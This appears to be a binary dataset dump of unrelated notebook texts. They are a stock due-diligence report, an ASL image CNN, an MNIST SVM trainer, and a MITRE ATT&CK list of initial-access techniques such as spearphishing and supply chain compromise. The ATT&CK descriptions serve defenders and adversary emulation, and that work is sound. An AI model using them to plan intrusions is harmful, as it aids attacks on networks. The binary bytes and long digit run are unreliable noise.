�����    �   huggingface�{"info": {"features": {"id": {"dtype": "string", "_type": "Value"}, "text": {"dtype": "string", "_type": "Value"}, "dataset_id": {"dtype": "string", "_type": "Value"}}}}p4���� dataset_id��������text���� id����  ���   �� ����&�&�(6|Ѕ�����P�@���� $*/5:?DJPV\bhntz���������������������� &,28=CIOU[agmsy����������������������  &,28>DJPU[agmsx}����������������������  &,28>DJPV\bhntz����������������������� #)-39?EKQW]bhntz���������������������� $*06<BHNTZ`flrw|���������������������� #(.39?EJPV\bhntz����������������������%+17=CIOU[aflrx~���������������������� "(.4:@FLRX^ciou{�����������������������    ! ' - 3 9 ? E J O U Z ` e k q w } � � � � � � � � � � � � � � � � � � � � �     # ) / 5 ; A G L R X ] c i o u { � � � � � � � � � � � � � � � � � � � � � �      % + 1 7 = B H N T Z ` f l r x ~ � � � � � � � � � � � � � � � � � � � � � �      & + 1 7 = C H N T Z ` f l r v { � � � � � � � � � � � � � � � � � � � � � � �     ! ' - 2 8 = C G M S X ^ c i o u { � � � � � � � � � � � � � � � � � � � � � �  %)/5;AGMSY_ekqw}���������������������� "(.4:@FLRX^diotz���������������������� $*06<BHNTZ`fjpv|����������������������� !'-28>DJPVZ`flrx|����������������������%+17=CHNTZ`flqw}���������������������� !'-39?EJPV\bhntz����������������������  &,28>DJPV\bhntz���������������������� !'-39?DJPV\bgmsx~��������������������� !'-39?EKQW]ciou{���������������2127865754852213424395302817741311855516529006937553588490409583404226797324884663942753612620844730896928598460526259212812124919259455337244693511746562907738233272311147482471929364510148955480270107782735683995535355832648085184306126846649803840524039192755751089272719891657935133305597022188686256466073289721558835848370239548353894145424636742865992254501215190460902564671261267743279316801244000640730011511360632859421488033317917090825126320005758560941128324504218703597405275275216255135865930654155936487360190214353694823252633321514119059655575529783532099336682375229151870631263917693781752379845711004901995800585389247970520969344865481442305222672315225210880732461548959507150387237662732484956755075871553695551897441516461264862451836578802614265070012879683278634150132802853836026471936636126768453862234488643755940995064382263748360290554982263213258326966120651193612856353315418258564737602837492098105531650711320788362669495855224763138194908904857413835793395149484517471867834431211585655959846145802232922064475239663174814966258531403461466164330933565366327808336867431800345844447895820212198944384861422338697230181540296316512025798944158621277127224220939585106284243809433473828203832962453035156262758331999370305196414875831900543167165120075090133173691548877336951161957285833907624091126623953064631177856300628833612504661183755888348477958094722305333436112745829841743785337652255422974105355822477557136737573318942358876822007449096357828237524320081266071357335418441350343644002263399243036952498536908922987564080665297360784776202848126518803308962689643545316676212272826067710640314452327008739983319785646759372750311185568633491833264924596465046433747034785095433186246832784881772913709131288583259613679023639963504395026094168453155245787894497237244224556517204142488931255662454125599466696439492316813416257819055737607612380263399304180648650665230386390363322318852364499168883562220802927190434548491488514211334394908982295223954611463933923812862614056566185895534535161623573343549195906352556342618401693006613034906502590765442104217805662142492502640391801101883904122618088665011353001320274873979712991997281502212383725225256725765855811140031594661398665752286912648011630266480895757645856236355742499438878643777139229748811163387452363705921829895251831811445575215847666066985096855834521822291554368157678106046516993928362663018928880535845941892660149211950947192710559554613466548468708485749203362156940229754141895307921449978509892370201415109468317531732427438590656266761156372353341455125123852843175771953161011629912673805633161442963977739365832145136885655875629727287028330740369731151059224326401492519670541730479197299594213863444734338886184442348202630130326395511786089301935851761228470047881514517624205347671652726757301786072832722979682071334908595525442048096629344019047706347336663583250678532027921637653608245657534889943879726719491624303958573687460606539745501224813422433030028353904023451930284235430350135952846122630166483492853457930678823887116729627068042524825810254399040354516602693793583995254774259084517895813145976361836262318281256276083072253203160803711970922613029871861603021586455276835764028052472927156656202877803031479836046754681310693432903240957698341454451711015922454755141187515520137661349811328727022976664458615043357657703634769984510135465928212056291450683469842346793348430478323636268652316168133703255638465778630999380520596673353187321314069855583032148626239556466214953481423973806984227819398126386023504960656853427436863245283240712385306648385735915300142835466593582026502935602828274237161990268072351372472916512514143415223103602265135012251833459427433579299781632880507918443104774885603363004822477494542572004649762122602918517052473532125224185257388665787060051145645280646599708140128571397377931482829181065307775206578483529127454422292161724180911232240151847241293865249418751807339079265132164481698712285861562728301165823254548427251053604532614520986838370929779615253813808930261636531613052397770144049273957386654429071182070352990108756229265440877663067233169626066190520163075368325283068347190249849452660341656957144441937135220118719807767349134317313026214147577657397536782164060285118708801715948946682710816520939523563905555157400810225912665662283811781155726742004658626611325015504024816738392944818369371173153160897131653197910274925711431153152343712268819790434862324334949222077181942384057394919624140275928901874353726011531676568425305893275494100142490620469514133652063119562867761576525702293496477916112568614514431463410784429458297362150192150050471953480590574835162561774521164863807234106421133249756858252125809224956607085404741466366456924129431910016351551406774027511772033160622260437110157365566395538372826462965933652656102240409012406756490506502939284525315346472274526844201706361097489837269350112513608005514642548742743141870661785234077412488755954883187782692601562484319321580574331544604916525193921085033903802675574225444951631602027003785533638093384574957615536635765045124506013315139756035724106553116101444509261102039443979630937663865659669147021528897110186609259144367122412388138411007648321617330638093399724787011683304396263745752687696499406144631399393339314476324606462858706659843847103483443935832127412225402415544470681488461305175026663731291242925446104008424626265440795703761247813941449618413589020920132050157448540357102191231224036471032651264011400134246573292541789611604782616591318484794606101462031764118125664292945256487475276473356165367017754447933629598757689798987947166195155963443801235920582065633474298958575321548642510766209568635746210807376769525768401368425963202357621278449837029723672923124124321058557045265310221649861613664362313562877610279321716�0"~/�!����_���D�ino�q ���2�6��2$?�i�c�$�$��!�,Y-f��� �b'9�:?V\����T��·������X�j�5>*�-�4CKth@�.��4�CmN�S,}Ý�Z�f���@E�=���J����փC�5�f � � �< wM �k �� � � x� �� �F )S?)�C)�M)�y)�)֙)��)p�)$�)��)[�*��*�+x@+�D+�U+�r+�+��+��+��+8�+7�+�+��+�,� ,gZ,�g,�m,��,��, �,`�,�G-�N-�t-b�-��-�-�-�#.cH.BN.�.Ғ.��.4�. �.��.�/y6/�C/�]/�^/Rl/#�/�/J0)?0lH0�`0#1-171�1�1�710T1{c1sj1J|1O�1M2�52Vh2��2y�22 3�3��3��3h�3 �34�4mH4�Y4�j4D�4½4��4W�4��4�5z5OC5�E5�m5MP6�v6��6k�6�7�+7EH7bP7?7&�7I�7�@8�8Ѻ8t�8��<9�<��<��<c= =�(=E9=6G=yw=��=ݴ=��=�=#�=��=� >c>�(>�?>TN>+e>c>�>��>��>&�>� ?7?*?r6?u@?�G?w[?>�?Ȯ?��? �?f@�6@�@@�]@��@I�@:�@9�@&�AϸA��A�B�B�$BDJB�sB�xBm�Bq�B�B3�B��B��B��B�C. C2C!wCk{C;�Ch�C�C��C��C\�C��C��Cd�CD�C�CVD9DO#D��D4�DnEViESmEL}E��E��E�F] F�.F��F��F�F��F�Fo�FT�Fk�F�?G4uG�G�G�G�G�G�4H�oHg�H� I�HI�bI�nI�ID�I�I �I��I��I>OJ�iJ�qJG�J�JԶJf�JOK�K�K�3K�7K^Kh|Kh�K�K#�Kw�K�K��Kr�K �LðL��L�Lt�L�Me'M�/M=lMpM�QO�YO�tO��O��O�O��OM�O9�O�P�P�&P�U=LUHkU�lU~mU��UC�U�>V�NVnVuV��V:W MW�OW=\W�kWϔW��W�W��W� X5X�xX��X%�XDYuY5Y�^Y?dY�oYE�Y��Y�6Z�FZzZ��Z[�[g$[>[[�[��[��[��[�H\�Q\�d\c� c�1c#Tc Uc�YcA�c��c��c_ d�d�5d�=d�Bd�Ld�Sd�Yd*�dY�dj�d�d9�d�6e\e4o�Lo�no �od�o}>pRKp�Lp_rp��p��p�pOqU*q&|db|�k|�p|t�|�}�}�'}t:}Re}�p}/�}��}��}��}��}c~�~S ~�*~/P~tU~td~�z~�~;�~��~��~tS;���V���f��e��u��O����,�;E�De����hځm)�c~����,�����j��z��e���Z.�p������N�.]�^^�"DŽ�ՄN$��'�(5�,9��X��g�H��?��Ԕ�v�����g��#Dž|ЅNotebook setupimport io import warnings from datetime import datetime, timedelta import matplotlib.pyplot as plt import matplotlib_inline.backend_inline from openbb_terminal import api as openbb from openbb_terminal.helper_classes import TerminalStyle %matplotlib inline matplotlib_inline.backend_inline.set_matplotlib_formats("svg") warnings.filterwarnings("ignore") try: theme = TerminalStyle("light", "light", "light") except: pass stylesheet = openbb.widgets.html_report_stylesheet()Select Ticker# Parameters that will be replaced when calling this notebook ticker = "AMC" report_name = "" ticker_data = openbb.stocks.load(ticker, start=datetime.now() - timedelta(days=365)) ticker_data = openbb.stocks.process_candle(ticker_data) report_title = f"{ticker.upper()} Due Diligence report ({datetime.now().strftime('%Y-%m-%d %H:%M:%S')})" report_title overview = openbb.stocks.fa.models.yahoo_finance.get_info(ticker=ticker).transpose()[ "Long business summary" ][0] overviewData( df_year_estimates, df_quarter_earnings, df_quarter_revenues, ) = openbb.stocks.dd.models.business_insider.get_estimates(ticker)1. Yearly Estimatesdisplay_year = sorted(df_year_estimates.columns.tolist())[:3] df_year_estimates = df_year_estimates[display_year].head(5) df_year_estimates2. Quarterly Earningsdf_quarter_earnings3. Quarterly Revenuesdf_quarter_revenues4. SEC Filingsdf_sec_filings = openbb.stocks.dd.models.marketwatch.get_sec_filings(ticker)[ ["Type", "Category", "Link"] ].head(5) df_sec_filings5. Analyst Ratingsdf_analyst = openbb.stocks.dd.models.finviz.get_analyst_data(ticker) df_analyst["target_to"] = df_analyst["target_to"].combine_first(df_analyst["target"]) df_analyst = df_analyst[["category", "analyst", "rating", "target_to"]].rename( columns={ "category": "Category", "analyst": "Analyst", "rating": "Rating", "target_to": "Price Target", } ) df_analystPlots 1. Price historyfig, (candles, volume) = plt.subplots(nrows=2, ncols=1, figsize=(5, 3), dpi=150) openbb.stocks.candle( s_ticker=ticker, df_stock=ticker_data, use_matplotlib=True, external_axes=[candles, volume], ) candles.set_xticklabels("") fig.tight_layout() f = io.BytesIO() fig.savefig(f, format="svg") price_chart = f.getvalue().decode("utf-8")2. Price Targetfig, ax = plt.subplots(figsize=(8, 3), dpi=150) openbb.stocks.dd.pt( ticker=ticker, start="2021-10-25", interval="1440min", stock=ticker_data, num=10, raw=False, external_axes=[ax], ) fig.tight_layout() f = io.BytesIO() fig.savefig(f, format="svg") price_target_chart = f.getvalue().decode("utf-8")3. Ratings over timefig, ax = plt.subplots(figsize=(8, 3), dpi=150) openbb.stocks.dd.rot( ticker=ticker, num=10, raw=False, export="", external_axes=[ax], ) fig.tight_layout() f = io.BytesIO() fig.savefig(f, format="svg") ratings_over_time_chart = f.getvalue().decode("utf-8")Render the report template to a filebody = "" # Title body += openbb.widgets.h(1, report_title) body += openbb.widgets.h(2, "Overview") body += openbb.widgets.row([openbb.widgets.p(overview)]) # Analysts ratings body += openbb.widgets.h(2, "Analyst assessments") body += openbb.widgets.row([price_target_chart]) body += openbb.widgets.row([df_analyst.to_html()]) body += openbb.widgets.row([ratings_over_time_chart]) # Price history and yearly estimates body += openbb.widgets.row( [ openbb.widgets.h(3, "Price history") + price_chart, openbb.widgets.h(3, "Estimates") + df_year_estimates.head().to_html(), ] ) # Earnings and revenues body += openbb.widgets.h(2, "Earnings and revenues") body += openbb.widgets.row([df_quarter_earnings.head().to_html()]) body += openbb.widgets.row([df_quarter_revenues.head().to_html()]) # Sec filings and insider trading body += openbb.widgets.h(2, "SEC filings") body += openbb.widgets.row([df_sec_filings.to_html()]) report = openbb.widgets.html_report(title=report_name, stylesheet=stylesheet, body=body) # to save the results with open(report_name + ".html", "w") as fh: fh.write(report)Data / Preprocessingtrain_valid_path = '../../data/asl_alphabet_train' test_path = '../../data/asl_alphabet_validation' pp_func = keras.applications.vgg16.preprocess_input datagen = ImageDataGenerator( preprocessing_function=pp_func, rescale=1./255, validation_split=0.2) testgen = ImageDataGenerator( preprocessing_function=pp_func, rescale=1./255) classes = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ') classes.append('del') classes.append('space') classes.append('nothing') image_size = 128 batch_size = 10 print('done') train_batches = datagen.flow_from_directory( train_valid_path, #directory for training images target_size=(image_size, image_size), batch_size=batch_size, class_mode='categorical', classes=classes, # color_mode='grayscale', shuffle=True, subset='training') print('done') val_batches = datagen.flow_from_directory( train_valid_path, # same directory for testing images target_size=(image_size, image_size), batch_size=batch_size, class_mode='categorical', classes=classes, # color_mode='grayscale', shuffle=True, subset='validation') print('done') test_batches = testgen.flow_from_directory( test_path, # directory for validation images target_size=(image_size, image_size), batch_size=batch_size, class_mode='categorical', classes=classes, # color_mode='grayscale', shuffle=False) print('done') assert train_batches.n == 69601 assert val_batches.n == 17400 assert test_batches.n == 30 assert train_batches.num_classes == val_batches.num_classes == test_batches.num_classes == 29 imgs, labels = next(train_batches) def plotImages(imgs_arr): fig, axs = plt.subplots(1, 10, figsize=(20,20)) axs = axs.flatten() for img, ax in zip(imgs_arr, axs): ax.imshow(img) ax.axis('off') plt.tight_layout() plt.show() plotImages(imgs) print(labels)Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers). Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers). Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers). Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers). Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers). Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers). Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers). Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers). Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers). Clipping i[...]Build & Train CNNmodel = Sequential([ Conv2D(filters=32, kernel_size=(3,3), activation='relu', padding='same', input_shape=(image_size,image_size,3)), MaxPool2D(pool_size=(2,2), strides=2), Conv2D(filters=64, kernel_size=(3,3), activation='relu', padding='same'), MaxPool2D(pool_size=(2,2), strides=2), Flatten(), Dense(units=29, activation='softmax') ]) model.summary() model.compile(optimizer=Adam(learning_rate=0.0001), loss='categorical_crossentropy', metrics=['accuracy']) model.fit(x=train_batches, validation_data=val_batches, epochs=10, verbose=2)Epoch 1/10Training NotebookThis notebook illustrates training of a simple model to classify digits using the MNIST dataset. This code is used to train the model included with the templates. This is meant to be a started model to show you how to set up Serverless applications to do inferences. For deeper understanding of how to train a good model for MNIST, we recommend literature from the [MNIST website](http://yann.lecun.com/exdb/mnist/). The dataset is made available under a [Creative Commons Attribution-Share Alike 3.0](https://creativecommons.org/licenses/by-sa/3.0/) license.# We'll use scikit-learn to load the dataset ! pip install -q scikit-learn==0.23.2 # Load the mnist dataset from sklearn.datasets import fetch_openml from sklearn.model_selection import train_test_split X, y = fetch_openml('mnist_784', return_X_y=True) # We limit training to 10000 images for faster training. Remove train_size to use all examples. X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=1000, train_size=10000) # Next, let's add code for deskewing images (we will use this to improve accuracy) # This code comes from https://fsix.github.io/mnist/Deskewing.html from scipy.ndimage import interpolation def moments(image): c0, c1 = np.mgrid[:image.shape[0], :image.shape[1]] img_sum = np.sum(image) m0 = np.sum(c0 * image) / img_sum m1 = np.sum(c1 * image) / img_sum m00 = np.sum((c0-m0)**2 * image) / img_sum m11 = np.sum((c1-m1)**2 * image) / img_sum m01 = np.sum((c0-m0) * (c1-m1) * image) / img_sum mu_vector = np.array([m0,m1]) covariance_matrix = np.array([[m00, m01],[m01, m11]]) return mu_vector, covariance_matrix def deskew(image): c, v = moments(image) alpha = v[0,1] / v[0,0] affine = np.array([[1,0], [alpha,1]]) ocenter = np.array(image.shape) / 2.0 offset = c - np.dot(affine, ocenter) return interpolation.affine_transform(image, affine, offset=offset) def deskew_images(images): output_images = [] for image in images: output_images.append(deskew(image.reshape(28, 28)).flatten()) return np.array(output_images)Scikit-learn Model TrainingFor this example, we will train a simple SVM classifier using scikit-learn to classify the MNIST digits. We will then freeze the model in the `.joblib` format. This is same as the starter model file included with the SAM templates.%%time import sklearn import numpy as np from sklearn.metrics import accuracy_score from sklearn import svm print (f'Using scikit-learn version: {sklearn.__version__}') # Fit our training data clf = svm.SVC(degree=5) clf.fit(X_train, y_train) # Test the fitted model for accuracy for the accuracy score accuracy = accuracy_score(y_test, clf.predict(X_test)) print('Test accuracy without deskewing:', accuracy) %%time # Let's try this again with deskewing on # Fit our training data clf = svm.SVC(degree=5) clf.fit(deskew_images(X_train), y_train) # Test the fitted model for accuracy for the accuracy score accuracy = accuracy_score(y_test, clf.predict(deskew_images(X_test))) print('Test accuracy with deskewing:', accuracy) import joblib # Save the model to disk with compression to keep size low joblib.dump(clf, 'digit_classifier.joblib', compress=3)Initial AccessThe adversary is trying to get into your network.Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords. Techniques| ID | Name | Description || :--------: | :---------: | :---------: |T1078.004 | Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.T1078.003 | Local Accounts | Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. T1078.002 | Domain Accounts | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.T1078.001 | Default Accounts | Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019)Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)T1195.003 | Compromise Hardware Supply Chain | Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.T1195.002 | Compromise Software Supply Chain | Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) T1195.001 | Compromise Software Dependencies and Development Tools | Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. T1566.003 | Spearphishing via Service | Adversaries may send spearphishing messages via third-party services in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.T1566.002 | Spearphishing Link | Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)T1566.001 | Spearphishing Attachment | Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.T1566 | Phishing | Adversaries may send phishing messages to elicit sensitive information and/or gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.Adversaries may send victim’s emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms.T1189 | Drive-by Compromise | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).Multiple ways of delivering exploit code to a browser exist, including:* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.* Malicious ads are paid for and served through legitimate ad providers.* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)Typical drive-by compromise process:1. A user visits a website that is used to host the adversary controlled content.2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.3. Upon finding a vulnerable version, exploit code is delivered to the browser.4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)T1190 | Exploit Public-Facing Application | Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).If an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)T1200 | Hardware Additions | Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.T1195 | Supply Chain Compromise | Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.Supply chain compromise can take place at any stage of the supply chain including:* Manipulation of development tools* Manipulation of a development environment* Manipulation of source code repositories (public or private)* Manipulation of source code in open-source dependencies* Manipulation of software update/distribution mechanisms* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions* Sales of modified/counterfeit products to legitimate distributors* Shipment interdictionWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)T1199 | Trusted Relationship | Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.T1133 | External Remote Services | Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally.Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.T1091 | Replication Through Removable Media | Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)#Invoke-AtomicTest-By can be downloaded from 